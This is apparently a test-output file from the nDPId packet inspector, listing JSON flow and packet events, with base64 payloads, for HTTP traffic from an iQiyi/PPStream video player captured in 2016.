+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7560000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1467353140709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":944,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":944,"pkt_l4_len":910,"thread_ts_msec":1467353140709,"pkt":"TF4M6gNlABxCjnAxCABFAAOiA\/BAAIAG5m3AqHMIymwO28UpAFCvhj83b730NFAYAQRULwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0xMTcmdG0zMT0wJnRtMzI9NDcmdG0zMz03OCZ0bTM0PTEmdG00PTEzNyZ0bTQxPTAmdG00Mj0xNiZ0bTQzPTEyNSZ0bTQ0PTImdG01PTE2NSZ0bTUxPTAmdG01Mj0wJnRtNTM9MCZ0bTU0PTEwJnRtNj0mdG02Mj0wJnRtNjM9MCZ0bTc9MCZ0bTcxPTAmdG03Mj0wJnRtNzM9MCZ0bTg9MCZ0bTgxPTAmdG04Mj0wJnRtODM9MCZ0bTk9OTE2JnRtOTI9MTYmdG05Mz02MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZyYT0yJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01470{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1012,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140709,"flow_last_seen":1467353140709,"flow_idle_time":7560000,"flow_min_l4_payload_len":890,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":890,"midstream":1,"thread_ts_msec":1467353140709,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=117&tm31=0&tm32=47&tm33=78&tm34=1&tm4=137&tm41=0&tm42=16&tm43=125&tm44=2&tm5=165&tm51=0&tm52=0&tm53=0&tm54=10&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=916&tm92=16&tm93=62&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=2&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1467353140720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140720,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5F1lAADMGIt3KbA7swKhzCABQxSvXmoUy4BpnKlAYACB7oAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7560000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1467353140755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":656,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":656,"pkt_l4_len":622,"thread_ts_msec":1467353140755,"pkt":"TF4M6gNlABxCjnAxCABFAAKCA\/NAAIAGOsjAqHMIZeMgJ8UsAFDdytkdPM+rpVAY\/\/BCUgAAR0VUIC92aS81MDA0OTQ2MDAvNTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEvP3NyYz0xXzExXzExNCBIVFRQLzEuMQ0KSG9zdDogY2FjaGUudmlkZW8uaXFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1014,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140755,"flow_last_seen":1467353140755,"flow_idle_time":7560000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":602,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1467353140755,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"cache.video.iqiyi.com","url":"cache.video.iqiyi.com\/vi\/500494600\/562e26caed5695900212eb3259070f8a\/?src=1_11_114","code":0,"content_type":"","user_agent":""}} +01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1467353140794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhBAADEGzgRl4yAnwKhzCABQxSw8z6ul3crbd1AQPSRKcgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkFjY2Vzcy1Db250cm9sLUFsbG93LUNyZWRlbnRpYWxzOiB0cnVlDQoNCmQ0OQ0KeyJjblByZW1UaW1lIjowLCJlZGl0b3JJbmZvIjoiIiwidmlkZW9RaXB1SWQiOjUwMDQ5NDYwMCwicmV3YXJkQWxsb3dlZCI6MCwibnVybCI6IiIsInN1cElkIjowLCJvbmxpbmVTdGF0dXMiOjEsImR0eXBlIjozLCJwdnUiOiIiLCJpc3N1ZVRpbWUiOjIwMTYwNjI1LCJ3cml0ZXIiOiIiLCJpc1RvcENoYXJ0IjowLCJxaXlpUGxheVN0cmF0ZWd5Ijoi5q+P5ZGo5LqU5ZGo5YWtMjA6MDAiLCJ1cCI6IjIwMTYtMDYtMjkgMTk6NDc6MDIiLCJpcExpbWl0IjowLCJ1biI6IiIsImV4Y2x1c2l2ZSI6MSwidm4iOiLjgIrkuIDmtL7mlrnoqIDjgItDLUJsb2Nr6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwicHR1cmwiOiIiLCJzdGFydFRpbWUiOi0xLCJzdCI6MjAwLCJ0eSI6MjAxNjA2MjUsInNtIjowLCJzaG93Q2hhbm5lbElkIjo2LCJwb3Z1IjoiIiwicHJvZHVjZXJzIjoiIiwiZXRtIjoiIiwic3VwTmFtZSI6IiIsInR2RW5hbWUiOiIiLCJzYyI6MCwiY2MiOjAsIm1kb3duIjowLCJwYW5vIjp7InR5cGUiOjF9LCJtYWluQWN0b3JSb2xlcyI6W10sInN1YktleSI6IjIwNDA3NjcwMSIsImFwaWMiOiJodHRwOlwvXC9waWM1LnFpeWlwaWMuY29tXC9pbWFnZVwvMjAxNjA2MjVcL2Q3XC81OVwvdl8xMTA1ODM2NjZfbV82MDEuanBnIiwiZXMiOjEsInByb2R1Y2VyIjoiIiwiZW5kVGltZSI6LTEsImF1IjoiaHR0cDpcL1wvd3d3LmlxaXlpLmNvbVwvdl8xOXJybGpmM2hnLmh0bWwiLCJjaXJjbGUiOnsidHlwZSI6MiwiaWQiOjIwNQ=="} +01823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1467353140794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1078,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1078,"pkt_l4_len":1044,"thread_ts_msec":1467353140794,"pkt":"ABxCjnAxTF4M6gNlCABFAAQovhFAADEGzgNl4yAnwKhzCABQxSw8z6+l3crbd1AQPSTsVQAANDczOTQ3fSwiaXNEaXNwbGF5Q2lyY2xlIjoxLCJwYXlNYXJrIjowLCJwbGMiOnsiNCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxMCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCI1Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjExIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjEyIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjciOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTgiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTMiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTQiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiOCI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNiI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIxNSI6eyJjb2EiOjEsImRvd25BbGQiOjF9LCIzIjp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjE3Ijp7ImNvYSI6MSwiZG93bkFsZCI6MX0sIjIiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjEiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMTkiOnsiY29hIjoxLCJkb3duQWxkIjoxfSwiMjAiOnsiY29hIjoxLCJkb3duQWxkIjoxfX0sIm50dmQiOjAsInR2Rm9jdXNlIjoi6ZW\/5rKZ6K+d44CK6ICB6KGX55qE5ZGz44CLIiwiY1R5cGUiOjcsInFpeWlQcm9kdWNlZCI6MSwidm90ZXMiOltdLCJhbGJ1bVFpcHVJZCI6NTAwNDk0NjAwLCJjYXRlZ29yeUtleXdvcmRzIjoi57u86Im6LDUwMDQ5NDYwMCwwLGh0dHA6XC9cL2xpc3QuaXFpeWkuY29tXC93d3dcLzZcLy0tLS0tLS0tLS0tLS0tLS0tLS5odG1sIOWGheWcsCwxNTEsMSxodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8xNTEtLS0tLS0tLS0tLS0tLS0tLS0uaHRtbCDlhbblroMsMTYxLDIsaHR0cDpcL1wvbGlzdC5pcWl5aS5jb21cL3d3d1wvNlwvLTE2MS0tLS0tLS0tLS0tLS0tLS0tLmh0bWwg5q2M6IieLDIxMjEsMixodHRwOlwvXC9saXN0LmlxaXlpLmNvbVwvd3d3XC82XC8tMjEyMS0tLS0tLS0tLS0tLQ=="} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1467353140888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353140888,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5fz1AADMGuwnKbA7bwKhzCABQxSlvvfQ0r4ZCsVAYADyHfQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01200{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1467353141138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1467353141138,"pkt":"TF4M6gNlABxCjnAxCABFAAJYBBhAAIAG54\/AqHMIymwO28UtAFDtOXdacCs02FAYAQQdugAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNDAmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01140{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1020,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353141138,"flow_last_seen":1467353141138,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1467353141138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1467353141308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353141308,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uEFAADMGggXKbA7bwKhzCABQxS1wKzTY7Tl5ilAYADfR4AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1467353142534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353142534,"pkt":"TF4M6gNlABxCjnAxCABFAAOkBEBAAIAG5grAqHMIymwO7MUnAFCB65f\/kZem+1AYQRL+yQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDIwNDQmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1467353144633,"pkt":"ABxCjnAxTF4M6gNlCABFAAFNZb1AADAG6WZ1T1GHwKhzCABQxQsUvd5l87WhOFAYAA4qLgAASFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjMzIEdNVA0KQ29udGVudC1MZW5ndGg6IDANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClNldC1Db29raWU6IFY9NjY5Mzg1MTYxNTg4NTA0OTAxMTsgRG9tYWluPW1sdDAxLmNvbTsgRXhwaXJlcz1TYXQsIDAxLUp1bC0yMDE3IDA2OjA1OjM3IEdNVDsgUGF0aD0vDQpMb2NhdGlvbjogaHR0cDovL2NtYy50YW54LmNvbS9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7560000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1467353144819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1467353144819,"pkt":"TF4M6gNlABxCjnAxCABFAAGuBX9AAIAGQAzAqHMIjM3zQMUyAFBCtQhgUXsfllAYQTeurQAAR0VUIC9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MSBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNClJlZmVyZXI6IGh0dHA6Ly9pbWFnZTEud2Vic2NhY2hlLmNvbS92b2RndWlkZS9pbWFnZXMvdGFvYmFvYWQvdGFvYmFvL3Rhb2Jhby5odG1sDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KQ29va2llOiBjbmE9L2NBSER3UTFtMndDQVhhakNGbzBCbmxmOyBjbmF1aT0xOTgzMTU5NDkzDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiBjbWMudGFueC5jb20NCg0K"} 